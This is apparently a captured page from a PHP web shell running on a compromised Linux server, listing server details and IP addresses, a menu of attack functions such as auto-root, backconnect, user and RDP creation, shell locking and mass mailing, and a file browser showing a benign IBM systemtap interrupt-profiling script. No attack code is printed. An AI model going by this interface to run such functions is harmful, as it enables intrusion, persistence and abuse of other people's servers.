Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.54
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
systemtap /
examples /
interrupt /
[ HOME SHELL ]
Name
Size
Permission
Action
interrupts-by-dev.meta
507
B
-rw-r--r--
interrupts-by-dev.stp
833
B
-rwxr-xr-x
interrupts-by-dev.txt
513
B
-rw-r--r--
scf.meta
610
B
-rw-r--r--
scf.stp
520
B
-rwxr-xr-x
scf.tcl
140
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : interrupts-by-dev.stp
#!/usr/bin/stap /* * Copyright (C) 2009 IBM Corp. * This file is part of systemtap, and is free software. You can * redistribute it and/or modify it under the terms of the GNU General * Public License (GPL); either version 2, or (at your option) any * later version. * * Version 1.0 prerna@linux.vnet.ibm.com 2009-10-28 * * Name: * interrupts-by-dev.stp * * Description: * Script to profile interrupts received by each device per 100 ms. * * */ global devices probe begin { printf("\t DEVICE \t NUMBER OF INTERRUPTS \n"); } probe irq_handler.entry { devices[dev_name]++; } probe timer.ms(100) { foreach ( devname in devices ) printf(" %20s : %5d\n",kernel_string(devname),devices[devname]); delete devices }
Close